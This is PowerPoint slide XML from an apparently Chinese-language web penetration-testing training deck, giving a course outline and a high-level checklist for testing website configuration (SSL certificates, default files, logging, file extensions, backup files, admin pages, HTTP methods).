              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SSL/TLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的加密规则和需求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>证书的有效性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>客户端和服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39138065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网站配置管理测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>配置测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务器默认安装时提供的实例应用程序和文件是否删除</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试是否存在的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注释</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试应用程序是否只启动了需要的功能模块，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>extension</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>扩展</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试应用程序是否使用定制网页而不是默认的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务器网页处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2150316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473274" y="966948"/>
            <a:ext cx="4962822" cy="540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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="004EA2"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>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marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的兴起</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>测试框架</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>渗透识别与分析阶段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>渗透攻击与探测阶段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>常见安全问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4283968" y="2924944"/>
            <a:ext cx="4104456" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>培训提纲</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36971706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网站配置管理测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>配置测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>测试服务器软件是否可以正确记录合法登录和错误</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>测试服务器的配置是否可以妥善处理超载，防止拒绝服务攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试日志是否包含敏感信息、是否存放在专用服务器、是否会产生拒绝服务攻击、是否保存备份、是否在记录前进行数据有效性验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试日志保存时间是多长、如何审查</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1775698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网站配置管理测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扩展名处理测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>尝试不同类型的扩展名文件的请求测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务器处理不同类型文件的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>行为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>了解哪些文件扩展名以纯文本形式返回哪些在服务器端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>运行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务器的行为确定应用程序所使用的技术、语言、插件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>尝试通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOS8.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>文件格式泄露文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>源码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.asa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>等扩展名是否可以被服务器以纯文本返回，测试其他扩展名文件是否包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>敏感</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2994683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网站配置管理测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>备份的文件测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>是否存在各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>压缩文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，可结合扫描工具扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试是否存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>各种备份文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，可结合扫描工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3429004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网站配置管理测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>后台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用管理页面测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>枚举</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>目录或文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/admin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>查看代码中的注释和链接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>审查服务器和应用程序文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>可选服务端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31268635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网站配置管理测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方法测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>是否启用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEBDAV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>组件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试开启了哪些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
